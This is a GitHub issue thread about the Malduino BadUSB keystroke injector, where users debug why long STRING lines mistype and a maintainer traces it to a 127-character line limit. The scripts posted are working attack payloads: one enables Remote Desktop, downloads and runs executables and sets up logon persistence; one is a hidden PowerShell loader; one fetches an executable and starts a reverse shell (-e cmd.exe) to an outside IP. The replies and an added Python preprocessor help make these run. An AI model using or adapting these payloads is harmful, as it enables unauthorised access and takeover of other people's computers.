Seytonic / malduino

All the Malduinos!
MIT License

Malduino Elite not entering in ENTER or some STRING lines properly #21

Closed ll3N1GmAll closed 6 years ago

ll3N1GmAll commented 6 years ago

Most of my scripts are not functioning as they do on the Bunny and Ducky platforms. I am seeing duplicate string sections entered where they don't exist in the script, and other keys, such as ENTER, not being inserted properly. Example:

STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DELAY 200
ENTER
DELAY 3000
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
DELAY 200
ENTER
DELAY 3000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
DELAY 200
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
DELAY 200
ENTER
STRING %WINDIR%\System32\payload.exe -i -d -s /accepteula %WINDIR%\System32\payload2.exe
DELAY 200
ENTER
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

This section should output the following in a Notepad:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.exe')
powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2.exe')
%WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\payload.exe
schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

HOWEVER, this is what it outputs consistently:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDenyTSConnectionsreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fAllowToGetHelppowershell (new-object System.Net.WebClient).DownloadFile('http:///payload.txt','%WINDIR%\System32\payload.ex powershell (new-object System.Net.WebClient).DownloadFile('http:///payload2.txt','%WINDIR%\System32\payload2. %WINDIR%\System32\payload2.exe -i -d -s /accepteula %WINDIR%\System32\payload.exeschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\payload.exe"

Some of this behavior seems similar to the bashbunny firmware bug that caused issues with strings that ended in .TXT. For some reason that threw the device into a bizarre fit. These oddities feel very similar to that type of thing.

ll3N1GmAll commented 6 years ago

Here is another example (actual payload text removed):

GUI r
DELAY 5000
STRING cmd
DELAY 200
ENTER
DELAY 5000
STRING if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"")))), [IO.Compression.CompressionMode]::Decompress)), [STRING.Encoding]::ASCII)).ReadToEnd();")
DELAY 200
ENTER

This is the output:

cmd
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamR
")

So, it types "cmd" and then injects ENTER. Then it starts to type until it gets to `"Invoke-Expression $(New-Object IO.StreamR")`. Then it goes back 2 spaces to the left of `")` and then injects an ENTER, which drops the `")` down to the next line, and the payload never progresses beyond this point.

I have a similar payload, but that one opens an admin prompt for an admin shell. It stops at the exact same place, performs the identical move of the cursor back 2 places and then injects ENTER before the script stops entirely.

Nibot1 commented 6 years ago

Please try to split your STRING into multiple STRINGs, because the maximum number of chars in a line is 256. Example:

GUI r
STRING cmd
ENTER
STRING Hello
STRING My
STRING Name
STRING is
ENTER

All of these STRINGs will be written on one line.

ll3N1GmAll commented 6 years ago

Thanks for your reply. I will take that limit into consideration when developing payloads, but since some text is being duplicated and the errors are occurring at less than 100 characters in, I'm not sure that is related. I will do this and report back just to make sure, though. Thanks again for your reply!


ll3N1GmAll commented 6 years ago

The first payload has no lines near 256 characters and it is still behaving in the manner described in my first post. It is acting as though it is possessed. I'm thinking that there is some character or character combination that is causing it to respond in a buggy way, like the Bash Bunny issue on firmware versions <1.4 with strings that ended in .TXT.

Nibot1 commented 6 years ago

Please try to change the "#define buffersize 256" to "#define buffersize 128" and shorten your lines to 127 chars per line.

GreenSales commented 6 years ago

This is the code I have:

DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER

Notepad:

cmd
cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPoliy
START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit

What should I do? The Malduino doesn't write all the letters...

GreenSales commented 6 years ago

@Nibot1 Can anyone here tell me why the Malduino sometimes writes the string OK and sometimes not?

Nibot1 commented 6 years ago

@GreenSales You must place a STRING command in front of every line with text that should be typed. Example:

STRING hello
STRING World

will get "hello World" written without a line break.
And remember, each line can only hold 127 chars, including spaces.

Try this code:

DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1
STRING & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER
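
As an added example (not code from the Malduino project or from anyone in this thread), the following Python pre-processor applies the rule Nibot1 gives above mechanically: any STRING line longer than 127 characters is split into consecutive STRING lines, which the device types back-to-back without a line break, and a small model of the typing confirms the text reaching the target is unchanged. Two assumptions are mine rather than taken from the firmware: the limit counts the whole line including the "STRING " keyword (so each STRING carries at most 120 characters of payload), and a 128-byte buffer holds 127 characters, matching the numbers used in this thread. The input is GreenSales' script from this issue.

```python
"""Ducky Script line-length pre-processor (added example, not Malduino code).

Splits over-long STRING lines into consecutive STRING lines so that no line
exceeds the limit the thread settled on (buffersize 128, 127 chars per line).

Assumptions (mine, not taken from the firmware source):
  * the limit applies to the whole line, keyword included ("STRING " is 7);
  * a 128-byte buffer holds 127 characters.
"""

MAX_LINE = 127
KEYWORD = "STRING "


def split_string_line(line: str, max_line: int = MAX_LINE) -> list[str]:
    """Return one or more STRING lines, each at most max_line characters.

    Pieces are exact substrings of the original text, so joining them back
    reproduces it character for character. The cut is placed between two
    non-space characters (inside a word) whenever one exists nearby: a piece
    that ends or starts with a space could have that space trimmed by a
    keyword parser, and the seam would then lose its separator.
    """
    if not line.startswith(KEYWORD):
        return [line]
    budget = max_line - len(KEYWORD)
    if budget < 2:
        raise ValueError("max_line too small to carry any text")
    text = line[len(KEYWORD):]
    pieces = []
    while len(text) > budget:
        cut = budget
        # Look back up to 20 characters for a cut that is not next to a space.
        for c in range(budget, max(budget - 20, 1), -1):
            if text[c - 1] != " " and text[c] != " ":
                cut = c
                break
        pieces.append(KEYWORD + text[:cut])
        text = text[cut:]
    pieces.append(KEYWORD + text)
    return pieces


def preprocess(script: str, max_line: int = MAX_LINE) -> str:
    """Rewrite a whole script so that no line exceeds max_line.

    Only STRING lines can be split; any other over-long line (a long REM,
    for instance) is reported instead of being silently shortened.
    """
    out = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if line.startswith(KEYWORD):
            out.extend(split_string_line(line, max_line))
        elif len(line) > max_line:
            raise ValueError(f"line {lineno} is {len(line)} chars and is not a STRING line")
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def typed_text(script: str) -> str:
    """Model of what reaches the target: STRING types its text, ENTER types a
    newline, every other command (DELAY, GUI, CONTROL, ...) types nothing.
    Used to check that preprocessing does not change the typed result."""
    typed = []
    for line in script.splitlines():
        if line.startswith(KEYWORD):
            typed.append(line[len(KEYWORD):])
        elif line.strip() == "ENTER":
            typed.append("\n")
    return "".join(typed)


# GreenSales' script from this issue; its second STRING line is 149 characters.
SAMPLE = """DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING cd / & mkdir win & cd win & echo (wget 'https://tinyurl.com/ybqaln6m' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
DELAY 500
ENTER
DELAY 500
STRING START /MIN a.exe 192.168.1.3 25565 -e cmd.exe -d & exit
ENTER
"""

if __name__ == "__main__":
    fixed = preprocess(SAMPLE)
    print(fixed)
    assert typed_text(fixed) == typed_text(SAMPLE)
    assert max(len(l) for l in fixed.splitlines()) <= MAX_LINE
```

The cut lands inside a word on purpose ("-ExecutionPol" / "icy ByPass ..."), so neither piece begins or ends with a space and nothing depends on how the firmware trims whitespace after the keyword. As the thread does, type the result into Notepad first to confirm the seams come out as intended.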

Nibot1 commented 6 years ago

Is this issue solved?

GreenSales commented 6 years ago

Well, with that string, yes. But always after I start up my PC a script is written wrong, and after I replug the USB everything is all right. I can't see why that happens.

ll3N1GmAll commented 6 years ago

I will try to implement your proposed fix and modifications to my payloads tonight and reply back with results. Thank you for your response.

ll3N1GmAll commented 6 years ago

Looking at my #define buffersize attribute, it was already set to 128, but I didn't change it. I will reformat the payloads accordingly and report back. Thanks for your help!

ll3N1GmAll commented 6 years ago

With buffersize set at 128 and all lines at 127 chars total or less, it is working. Thanks!

Nibot1 commented 6 years ago

@ll3N1GmAll Is this issue solved? If yes, please close the issue.

ll3N1GmAll commented 6 years ago

Yes, this issue is resolved. I explained that in my response 13 days ago, but was not aware that I needed to close this (or even that I could close it). I apologize for my ignorance. I now see the "close and comment" button I overlooked last time. Closing now, thanks so much for your help. This has made my Malduino everything I had hoped it would be! :)